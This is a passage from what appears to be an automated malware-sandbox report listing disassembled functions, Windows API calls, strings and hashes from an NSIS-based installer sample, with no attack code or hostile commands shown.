                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: CallbackDispatcherUser
                                                                                                • String ID:
                                                                                                • API String ID: 2492992576-0
                                                                                                • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

                                                                                                Non-executed Functions

                                                                                                Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                • String ID: $ @$M$N
                                                                                                • API String ID: 1638840714-3479655940
                                                                                                • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                Strings
                                                                                                • ptF, xrefs: 00406D1A
                                                                                                • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                • \*.*, xrefs: 00406D2F
                                                                                                • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                • API String ID: 2035342205-1650287579
                                                                                                • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                  • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                  • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004255E0,771B23A0,00000000), ref: 00406902
                                                                                                • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                • String ID: F$A
                                                                                                • API String ID: 3347642858-1281894373
                                                                                                • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                • API String ID: 1916479912-1189179171
                                                                                                • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004255E0,771B23A0,00000000), ref: 00406902
                                                                                                • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,004255E0,771B23A0,00000000), ref: 00406A73
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                • API String ID: 3581403547-1792361021
                                                                                                • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                Strings
                                                                                                • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateInstance
                                                                                                • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                • API String ID: 542301482-1377821865
                                                                                                • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                Function 004079A2 Relevance: .3, Instructions: 347COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                Function 0040737E Relevance: .3, Instructions: 303COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                  • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                • API String ID: 20674999-2124804629
                                                                                                • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                • GetSysColor.USER32(?), ref: 004041DB
                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                  • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
